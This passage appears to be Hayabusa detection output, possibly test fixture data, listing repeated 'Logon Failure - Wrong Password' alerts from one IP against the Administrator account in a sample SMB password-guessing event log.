+2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sinFBozyUR0sBadM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Au22Y0LIuvTmZDpy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QDWW3VfZ7rKayV2v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPgaFDZtc5wEupnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpYZc2TTDfJFnPHo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rYKkl1iHImW9NwKv | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KxA2dh1iUMaMWOkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sCzEzW8jDZGGZcpd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p8510u5OsCVd94I5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2a0whHngnv7o1Bz2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xy6cGuYgubjlXoMw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: luoXLN2XZQC0lHfu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8jdKLW96haKCHHXI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9SQSH6E1aKXu1o7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nOUdKa838wK1mLFw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aFmILxspIJsiEHwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCz7qbdSEyqxQSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ny3F1xPgakJK0CA7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vi7Moaa6d12CzWhl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fbbRVOig9bn9p5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qSZrfRe9d0LLkbmA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QqdZMYsbXFlrKFxk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kypdxj88trEUBEny | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9hM8fge1IrNsJNd2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SzG27JSj6iAFyiNT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hWcjuW8dU5ATLHzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ns9lm9Nvhvi4fY6A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aExdYPqY2eUCYZmC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: t9cnmRGdByuJlKZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f9RvWTFFUgCrhlkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HC3oQUIEWqztyx6s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TK3BOeD2w9xPB4N1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I6yzU5WuvpmPKLSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GFoUGsara5Pl03WP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLaOCImeMIMlGvMj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Vzb3pEI2ZeP2NFA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Fa7ebH7UXd1KW4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wRBHXRkOa6x5KI5G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VNVxzgOLrZzfP3cB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCNXajRX2lIgLQuc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x0nukf24IoalycOn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZFZN0KfeHtyDppG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmxqKyWU5GU1y22P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuRyvCfgQ4rwG3fu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3prKZt5ymouwNKnK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: CWrNNn13EC1FLwLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfnBT5OvT5cQXHfS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLZFPCShXoPvvThS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UsPCJ0UlfH4urYrm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIQlOetFByLZqPkT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9IBZ0qTDlHWADZt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lmhkB39gKvvuT89e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4KPoZ8JB7WSjUCHW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0mwiPq4gF1YXkQSl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y5ncgrpwOFo7E8vg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KbkG8ezrAPFC0iKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW4WKkHocNadDzrb | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: unbtFAiykcfKTbQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oRzF1s9XVoRmoFQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9TO1c7eYd1IQHVwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wsn5GM4BqEl6A6pY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pq350wqwVDQlTKu9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: uMJWwjG7J2sOiBYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3YusfxQQygi2x5Cu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q29uj6ovfwz0riC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cj38VsqGLoQ8jGdf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOW8OIO2vQRFaTID | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfYITdZCYwEj9IJV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4BI6V35tZGZ1WGtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOF75n4aunKH9qxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jsTFTCnFFBkhG5jP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qiwcKE2TQui2H8z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PZOCyXplWOCyKbFm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RhyaAhYB78nbh1Ig | IP Addr: 192.168.198.149 | AuthPackage: 
